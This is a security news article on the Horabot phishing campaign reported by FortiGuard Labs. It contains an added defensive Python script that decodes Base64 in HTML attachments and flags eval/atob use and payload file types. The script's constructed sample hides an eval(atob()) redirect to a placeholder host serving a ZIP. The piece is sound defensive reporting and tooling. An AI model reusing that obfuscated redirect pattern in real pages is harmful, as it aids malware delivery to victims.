Researchers at FortiGuard Labs uncovered a sophisticated phishing operation distributing the Horabot malware family, specifically targeting Spanish-speaking Microsoft Windows users in Latin America.
This campaign leverages carefully crafted phishing emails impersonating invoices or financial documents, which contain malicious HTML attachments engineered to evade detection and maximize infection rates.
Initial Infection Vector: HTML Phishing
Attackers initiated their campaign by sending phishing emails in Spanish, purporting to originate from legitimate businesses in Mexico.
The phishing emails contained ZIP file attachments, which housed weaponized HTML files.

When opened, these HTML files executed embedded, Base64-encoded scripts that redirected victims to remote URLs, launching a chain of payload downloads.
The process began with JavaScript code, which fetched a ZIP archive containing an HTML Application (HTA) file from a malicious server.
The HTA executed browser manipulation techniques and proceeded to download further scripts for deeper compromise.
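As an added defender-side example (not code from the article or from FortiGuard Labs), the following Python triage helper shows how the Base64-hidden redirect described above can be surfaced from an HTML attachment: it decodes quoted Base64 literals, pulls URLs out of the decoded layers, and flags archive or script downloads. The sample attachment, its lure text, and the placeholder host are constructed for the demonstration and are not indicators from the report.

```python
import base64
import binascii
import re

B64_RE = re.compile(r'["\']([A-Za-z0-9+/]{20,}={0,2})["\']')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
PAYLOAD_EXT = ('.zip', '.hta', '.vbs', '.js', '.bat', '.ps1', '.exe')


def decode_b64_strings(html):
    """Return every quoted Base64 literal in the HTML that decodes to readable text."""
    layers = []
    for blob in B64_RE.findall(html):
        try:
            text = base64.b64decode(blob, validate=True).decode('utf-8')
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 or not text: ignore this literal
        if all(c.isprintable() or c in '\r\n\t' for c in text):
            layers.append(text)
    return layers


def triage_html(html):
    """Summarise an HTML attachment: hidden layers, remote URLs, payload hints, verdict."""
    layers = decode_b64_strings(html)
    urls = set(URL_RE.findall(html))
    for layer in layers:  # URLs often live only inside the decoded layer
        urls.update(URL_RE.findall(layer))
    payload_urls = sorted(u for u in urls if u.lower().endswith(PAYLOAD_EXT))
    uses_eval = bool(re.search(r'\b(eval|Function|atob)\s*\(', html))
    return {
        'decoded_layers': layers,
        'urls': sorted(urls),
        'payload_urls': payload_urls,
        'uses_eval_or_atob': uses_eval,
        'verdict': 'suspicious' if (layers and uses_eval) or payload_urls else 'clean',
    }


# Constructed sample: an invoice ("factura") lure whose redirect is hidden in a Base64
# string run through eval(). Built with b64encode so the fixture is self-consistent;
# the host is a placeholder, not one of the article's indicators.
_HIDDEN = 'window.location = "http://dl.example.invalid/factura.zip";'
SAMPLE_HTML = (
    '<html><body><p>Factura adjunta</p><script>'
    'eval(atob("' + base64.b64encode(_HIDDEN.encode()).decode() + '"));'
    '</script></body></html>'
)

if __name__ == '__main__':
    import json
    print(json.dumps(triage_html(SAMPLE_HTML), indent=2))
```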
Multi-Stage Payload Delivery and Evasion
The infection chain exploited a combination of VBScript, AutoIt scripts, and PowerShell commands to achieve system reconnaissance, credential theft, and the deployment of secondary malware payloads.

The use of VBScript was especially notable for its anti-analysis features: it checked for the presence of Avast antivirus, virtual environments, or known machine names, and would halt execution if such conditions were detected.
The script also prepared staging directories, harvested system and user information, and exfiltrated this data to command-and-control (C2) infrastructure.
To obfuscate actions and minimize detection, the campaign downloaded legitimate tools such as AutoIt3 and Aut2Exe, alongside malicious encrypted payloads and decoding routines.
These artifacts were disguised as system updates or hidden files and leveraged to decrypt additional malware modules.
According to the Fortinet report, timed markers further reduced the likelihood of reinfection and simplified attack coordination.
Once implanted, Horabot aggressively harvested browser credentials from major browsers like Chrome, Edge, Opera, and others.
It also collected Outlook contact lists and email addresses, filtering out personal and non-corporate domains to construct targeted attack lists.
The malware then abused Outlook’s COM automation to distribute new phishing emails from compromised accounts, allowing for lateral propagation throughout organizational and personal mail networks.
Exfiltrated data, including credentials, system details, and harvested contact lists, was sent via HTTP POST requests to managed C2 endpoints using structured parameters for efficient parsing and victim profiling.
The malware also implemented persistence mechanisms via crafted shortcuts and batch scripts placed within Windows startup locations, ensuring reinfection and continued operation following reboots.
Fortinet’s security solutions, including FortiGate, FortiMail, FortiClient, and FortiEDR, detect and block all observed Horabot malware variants as HTML/Phishing, AutoIt/Agent, and BAT/Agent threats.
Experts recommend organizations educate staff about phishing, monitor for unknown file activity, and block emails with suspicious attachments or abnormal behaviors.
Additionally, regular updates and the deployment of endpoint protections are critical in mitigating these evolving threats.
Indicators of Compromise (IOCs)